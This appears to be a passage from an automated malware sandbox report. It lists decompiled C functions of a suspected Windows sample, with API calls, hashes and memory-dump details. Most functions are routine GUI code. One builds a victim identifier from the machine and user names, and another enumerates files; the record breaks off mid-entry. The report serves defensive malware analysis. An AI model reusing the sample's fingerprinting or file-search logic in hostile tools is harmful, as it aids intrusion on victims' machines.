                                                                        0x004717ed
                                                                        0x004717f0
                                                                        0x004717f6
                                                                        0x00471806
                                                                        0x00471816
                                                                        0x0047181b
                                                                        0x0047181e
                                                                        0x00471820
                                                                        0x00471822
                                                                        0x00471824
                                                                        0x00471824
                                                                        0x0047182b
                                                                        0x00471830
                                                                        0x00471837
                                                                        0x00471840
                                                                        0x0047184a
                                                                        0x00471851
                                                                        0x00471858
                                                                        0x0047185f
                                                                        0x00471869
                                                                        0x0047186c
                                                                        0x00471872
                                                                        0x00471874
                                                                        0x00471879
                                                                        0x00471880
                                                                        0x00471888

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID: d
                                                                        • API String ID: 4116985748-2564639436
                                                                        • Opcode ID: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction ID: 0b87a267c4685935d203ee5a8c4fb54ab077512866400b8bfe7b889297467223
                                                                        • Opcode Fuzzy Hash: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction Fuzzy Hash: 351182717443409BE700EF7D98CA3857AD05B1530CF0890BDEC488F397DABE95488369
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004274B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E004274B0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x496ac7 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x496aa8; // 0x4274b0
					 *0x496aa8 = E00427218(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x496aa8(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                        0x004274b6
                                                                        0x004274c0
                                                                        0x004274ea
                                                                        0x004274f3
                                                                        0x0042751b
                                                                        0x0042751b
                                                                        0x004274f5
                                                                        0x004274f5
                                                                        0x004274fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004274fa
                                                                        0x004274c2
                                                                        0x004274c7
                                                                        0x004274d4
                                                                        0x004274e6
                                                                        0x004274e6
                                                                        0x00427526

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004274FE
                                                                        • GetSystemMetrics.USER32 ref: 00427510
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromPoint
                                                                        • API String ID: 1792783759-1072306578
                                                                        • Opcode ID: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction ID: 0ca1a078767922ccf2f9ab2b13178130f2d88d21fff11c5ab282216ea325be36
                                                                        • Opcode Fuzzy Hash: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction Fuzzy Hash: 0201A232309224BFDB004F55FC84B5ABB55EB55364FD18037FA09ABA11D779DC818BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E63C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0043E63C(void* __eax, char __ecx, struct HWND__* __edx, void* __eflags, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				int* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00443514(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043E6A0(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x434668
						E0043E42C(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x434668
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L00426B08();
						asm("sbb ebx, ebx");
						_t22 =  &(__edx->i);
					}
				}
				return _t22;
			}








                                                                        0x0043e645
                                                                        0x0043e64a
                                                                        0x0043e64c
                                                                        0x0043e657
                                                                        0x0043e659
                                                                        0x0043e65c
                                                                        0x0043e660
                                                                        0x0043e667
                                                                        0x0043e66e
                                                                        0x0043e676
                                                                        0x0043e67b
                                                                        0x0043e67e
                                                                        0x0043e682
                                                                        0x0043e686
                                                                        0x0043e687
                                                                        0x0043e68f
                                                                        0x0043e691
                                                                        0x0043e691
                                                                        0x0043e65c
                                                                        0x0043e69a

                                                                        APIs
                                                                          • Part of subcall function 0043E6A0: 734518F0.COMCTL32(?,00000000,0043E665,00000000,00000000,00000000), ref: 0043E6B8
                                                                          • Part of subcall function 0043E42C: ClientToScreen.USER32(?,C), ref: 0043E444
                                                                          • Part of subcall function 0043E42C: GetWindowRect.USER32 ref: 0043E44E
                                                                        • 73451850.COMCTL32(?,?,hFC,?,00000000,00000000,00000000), ref: 0043E687
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73451873451850ClientRectScreenWindow
                                                                        • String ID: hFC$hFC
                                                                        • API String ID: 1718620977-3271904332
                                                                        • Opcode ID: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction ID: 83cfaa479dfe381d88bbdac577f0f16f2725ff20e945c221232cd3b5c31a28e6
                                                                        • Opcode Fuzzy Hash: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction Fuzzy Hash: D9F06277B012096B8B10DE9E98C189EF7ACEB4C224B54817BF518D3341D635EE148794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427388, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00427388(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x496ac6 != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x496aa4; // 0x427388
					 *0x496aa4 = E00427218(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x496aa4(_t14, _t17);
				}
				return _t19;
			}












                                                                        0x0042738e
                                                                        0x00427391
                                                                        0x0042739b
                                                                        0x004273c0
                                                                        0x004273c9
                                                                        0x004273f0
                                                                        0x004273f0
                                                                        0x0042739d
                                                                        0x004273a2
                                                                        0x004273af
                                                                        0x004273bc
                                                                        0x004273bc
                                                                        0x004273fb

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004273D9
                                                                        • GetSystemMetrics.USER32 ref: 004273E5
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromRect
                                                                        • API String ID: 1792783759-4033241945
                                                                        • Opcode ID: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction ID: f4212cdc0bcdd90a97bb4186d0bbb8f5baa078fbbc89cb2f22bd8dfda28a6ed8
                                                                        • Opcode Fuzzy Hash: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction Fuzzy Hash: D4017C323081249BDB20CB64E985716BB59EB52390F958067EC05EB612C6B8DC40DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00462F50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00462F50(void* __eax) {
				void* __ebp;
				char _t7;
				char _t8;
				struct HINSTANCE__* _t12;
				void* _t15;
				signed int _t16;
				void* _t19;
				CHAR** _t20;

				_t19 = __eax;
				_t7 =  *0x462fb0; // 0x0
				 *((char*)(__eax + 0x2b8)) = _t7;
				_t8 =  *0x462fb0; // 0x0
				 *((char*)(__eax + 0x2b9)) = _t8;
				_t16 = 0;
				_t20 = 0x47ac24;
				do {
					 *((intOrPtr*)(_t19 + 0x2bc + _t16 * 4)) = E004242CC(1);
					_t12 =  *0x496714; // 0x400000
					_t15 = E00425494(_t10, LoadBitmapA(_t12,  *_t20));
					_t16 = _t16 + 1;
					_t20 =  &(_t20[1]);
				} while (_t16 != 5);
				return _t15;
			}











                                                                        0x00462f54
                                                                        0x00462f56
                                                                        0x00462f5b
                                                                        0x00462f61
                                                                        0x00462f66
                                                                        0x00462f6c
                                                                        0x00462f6e
                                                                        0x00462f73
                                                                        0x00462f81
                                                                        0x00462f8b
                                                                        0x00462f9a
                                                                        0x00462f9f
                                                                        0x00462fa0
                                                                        0x00462fa3
                                                                        0x00462fac

                                                                        APIs
                                                                        • LoadBitmapA.USER32 ref: 00462F91
                                                                          • Part of subcall function 00425494: GetObjectA.GDI32(?,00000054,?), ref: 004254CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: BitmapLoadObject
                                                                        • String ID: DA$d-F
                                                                        • API String ID: 4240920667-4117158572
                                                                        • Opcode ID: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction ID: d86268dc89174e040b3bdf134327d5a64c67eb724b5f3c86b08247b70b8e43d5
                                                                        • Opcode Fuzzy Hash: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction Fuzzy Hash: 95F0E2257042906FC2009FAEADC0986FBA8E749215751017BE948C7322C6696841977D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044692C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0044692C(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x445600; // 0x44564c
					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E004459E0();
					}
					E004466C8(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                                        0x0044692d
                                                                        0x00446933
                                                                        0x00446938
                                                                        0x00446945
                                                                        0x00446956
                                                                        0x00446947
                                                                        0x0044694c
                                                                        0x0044694c
                                                                        0x0044695d
                                                                        0x00446964
                                                                        0x00446964
                                                                        0x0044696b
                                                                        0x0044696b
                                                                        0x00446974

                                                                        APIs
                                                                        • CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        • CreateMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateMenu$Popup
                                                                        • String ID: LVD
                                                                        • API String ID: 257293969-462541549
                                                                        • Opcode ID: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction ID: 06d8af0e65ff4525c3f7fd11a64e48488f021198afdba98e41057e88a90e2ea7
                                                                        • Opcode Fuzzy Hash: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction Fuzzy Hash: B4E0C9B0202200DBEF50FF65D5C16053BA4AB05319F92647FA8455B257C678D8858B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00433790, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00433790(intOrPtr __eax) {
				intOrPtr _t5;
				intOrPtr _t10;
				intOrPtr _t11;

				_t10 = __eax;
				ReleaseCapture();
				_t5 = 0;
				 *0x47a96c = 0;
				if(_t10 != 0) {
					_t11 =  *0x4323f0; // 0x43243c
					_t5 = E00403768(_t10, _t11);
					if(0 != 0) {
						L4:
						return SetCapture(E0043CC2C(_t10));
					}
					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
						 *0x47a96c = _t10;
						_t10 =  *((intOrPtr*)(_t10 + 0x30));
						goto L4;
					}
				}
				return _t5;
			}






                                                                        0x00433791
                                                                        0x00433793
                                                                        0x00433798
                                                                        0x0043379a
                                                                        0x004337a1
                                                                        0x004337a5
                                                                        0x004337ab
                                                                        0x004337b2
                                                                        0x004337c3
                                                                        0x00000000
                                                                        0x004337cb
                                                                        0x004337b8
                                                                        0x004337ba
                                                                        0x004337c0
                                                                        0x00000000
                                                                        0x004337c0
                                                                        0x004337b8
                                                                        0x004337d1

                                                                        APIs
                                                                        • ReleaseCapture.USER32(00000000,00436809,0000FFB8,?,0045FE8A), ref: 00433793
                                                                        • SetCapture.USER32(00000000,00000000,00436809,0000FFB8,?,0045FE8A), ref: 004337CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Capture$Release
                                                                        • String ID: <$C
                                                                        • API String ID: 1520983071-3423417450
                                                                        • Opcode ID: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction ID: f69f079f5be23d6e1fa85a04827f5d80959cc3868215f43c1aed832baa5a6738
                                                                        • Opcode Fuzzy Hash: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction Fuzzy Hash: 33E046F070030087DB10AF7A98C16073298BB4C306F44A87FAD08AB393C77CD995CA59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00434370, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00434370(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E00434328(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}





                                                                        0x00434371
                                                                        0x0043437b
                                                                        0x0043437f
                                                                        0x00434381
                                                                        0x00434392
                                                                        0x00434396
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434396
                                                                        0x00434381
                                                                        0x00434398
                                                                        0x0043439b

                                                                        APIs
                                                                        • WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434328: GlobalFindAtomA.KERNEL32 ref: 0043433C
                                                                          • Part of subcall function 00434328: GetPropA.USER32 ref: 00434353
                                                                        • GetParent.USER32(00000000), ref: 0043438D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                        • String ID: YBC
                                                                        • API String ID: 3524704154-2981556608
                                                                        • Opcode ID: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction ID: 7a30522fa15226b405c8248a6cc35b0061ab833cb262d2683d9bbae8bf9d1630
                                                                        • Opcode Fuzzy Hash: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction Fuzzy Hash: 62D0C7513003035B9F152AF65DC195A664C9FAD349B02247EBD415B623DE6DDC19531C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: vbc.exe PID: 6664 Parent PID: 5896 vbc.exeCOMMON

                                                                        Executed Functions

                                                                        Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                        0x0040725d
                                                                        0x00407268
                                                                        0x0040726c
                                                                        0x00407270
                                                                        0x00407274
                                                                        0x00407278
                                                                        0x0040727c
                                                                        0x00407280
                                                                        0x00407284
                                                                        0x00407288
                                                                        0x0040728c
                                                                        0x00407290
                                                                        0x00407294
                                                                        0x00407298
                                                                        0x0040729c
                                                                        0x004072a0
                                                                        0x004072a4
                                                                        0x004072a8
                                                                        0x004072ae
                                                                        0x004072bc
                                                                        0x004072c2
                                                                        0x004072d5
                                                                        0x004072dc
                                                                        0x004072ea
                                                                        0x004072f1
                                                                        0x004072fc
                                                                        0x0040730d
                                                                        0x00407310
                                                                        0x00407313
                                                                        0x00407324
                                                                        0x00407327
                                                                        0x00407346
                                                                        0x0040735b
                                                                        0x00407369
                                                                        0x00407373
                                                                        0x00407378
                                                                        0x0040737b
                                                                        0x00407385
                                                                        0x00407390
                                                                        0x00407395
                                                                        0x00407397
                                                                        0x0040739d
                                                                        0x004073a0
                                                                        0x004073a6
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073b0
                                                                        0x004073b3
                                                                        0x004073bc
                                                                        0x004073be
                                                                        0x004073c5
                                                                        0x004073c6
                                                                        0x0040739d
                                                                        0x004073ce
                                                                        0x004073d0
                                                                        0x004073d3
                                                                        0x004073d9
                                                                        0x004073df
                                                                        0x004073df
                                                                        0x004073e8
                                                                        0x004073eb
                                                                        0x004073f4
                                                                        0x004073f6
                                                                        0x004073f9
                                                                        0x004073fa
                                                                        0x004073d0
                                                                        0x00407403

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 1832431107-3760989150
                                                                        • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                        • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                        • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                        • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                        0x00406ec5
                                                                        0x00406ec7
                                                                        0x00406ecc
                                                                        0x00406ef7
                                                                        0x00406eff
                                                                        0x00406f03
                                                                        0x00000000
                                                                        0x00406f05
                                                                        0x00406f05
                                                                        0x00000000
                                                                        0x00406f05
                                                                        0x00406ece
                                                                        0x00406ed9
                                                                        0x00406ee7
                                                                        0x00406ee9
                                                                        0x00406f0a
                                                                        0x00406f0f
                                                                        0x00406f11
                                                                        0x00406f14
                                                                        0x00406f1a
                                                                        0x00406f20
                                                                        0x00406f27
                                                                        0x00406f3f
                                                                        0x00406f4e
                                                                        0x00406f41
                                                                        0x00406f45
                                                                        0x00406f4b
                                                                        0x00406f53
                                                                        0x00406f0f
                                                                        0x00406f5a

                                                                        APIs
